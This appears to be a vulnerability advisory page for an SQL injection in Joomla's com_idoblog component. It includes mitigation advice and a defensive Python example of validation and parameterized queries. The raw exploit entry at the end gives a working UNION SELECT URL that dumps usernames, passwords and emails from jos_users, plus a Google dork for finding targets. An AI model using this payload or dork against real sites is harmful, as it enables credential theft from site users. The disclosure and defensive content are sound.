Vendor: Joomla
By: NOCKAR1111
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Joomla
Affected Version From: All versions of Joomla with the com_idoblog component
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP3 (English)
2010

Joomla com_idoblog SQL Injection Vulnerability

This exploit allows an attacker to inject SQL code into the com_idoblog component of Joomla. By manipulating the 'userid' parameter, the attacker can execute arbitrary SQL queries on the database. The result of the query is then displayed on the website, potentially exposing sensitive information such as usernames, passwords, and email addresses of the Joomla users.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of Joomla or apply any available patches. Additionally, input validation and parameterized queries should be implemented to prevent SQL injection attacks.
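
The two layers named above, as an added example that is not code from the com_idoblog component or from Joomla: Python with an in-memory SQLite table stands in for the component's PHP/MySQL code, and the table contents, function names and the shortened sample request are constructed for illustration.

```python
import sqlite3
from urllib.parse import parse_qs, urlsplit

BASE = "http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337"
# Constructed, shortened request shaped like the one quoted on this page.
SAMPLE_REQUEST = BASE + "&userid=62+union+select+1,2"


def make_db():
    """Constructed stand-in for the jos_users table (sample rows only)."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE jos_users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)"
    )
    db.executemany(
        "INSERT INTO jos_users VALUES (?, ?, ?)",
        [(62, "alice", "alice@example.test"), (63, "bob", "bob@example.test")],
    )
    return db


def parse_userid(url):
    """Input validation: accept exactly one userid, and only a positive integer."""
    values = parse_qs(urlsplit(url).query).get("userid", [])
    if len(values) != 1:
        raise ValueError("userid must be supplied exactly once")
    raw = values[0]
    if not (raw.isascii() and raw.isdigit()):
        raise ValueError("userid must contain digits only")
    userid = int(raw)
    if not 0 < userid < 2**31:
        raise ValueError("userid out of range")
    return userid


def load_profile(db, userid):
    """Parameterized query: the value is bound as data, never spliced into SQL."""
    return db.execute(
        "SELECT id, username FROM jos_users WHERE id = ?", (userid,)
    ).fetchone()  # None when no row matches


if __name__ == "__main__":
    db = make_db()
    print(load_profile(db, parse_userid(BASE + "&userid=62")))
    try:
        parse_userid(SAMPLE_REQUEST)
    except ValueError as exc:
        print("rejected:", exc)
```

Either layer alone stops the request shown on this page; using both means a later change that loosens the validation still cannot alter the query's structure.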

Exploit-DB raw data:

# Exploit Title: joomla com_idoblog /SQL injection Vulnerability
# Google Dork: inurl:"com_idoblog"
# Date: 25/12/2010
# Author: NOCKAR1111
# Location:Algeria
# AuthorEmail:nockar1111@hotmail.com
# Language: php
# Tested on: windows xp sp3 en
# http://extensions.joomla.org/extensions/news-production/blog/9218

#Exploit:http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,2,concat%28username,0x3a,password,0x3a,email%29,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--

____________________________________________
Greetz:Lagripe-dz,BrOx-Dz,Mr NoRvI,indoushka
and dz4all members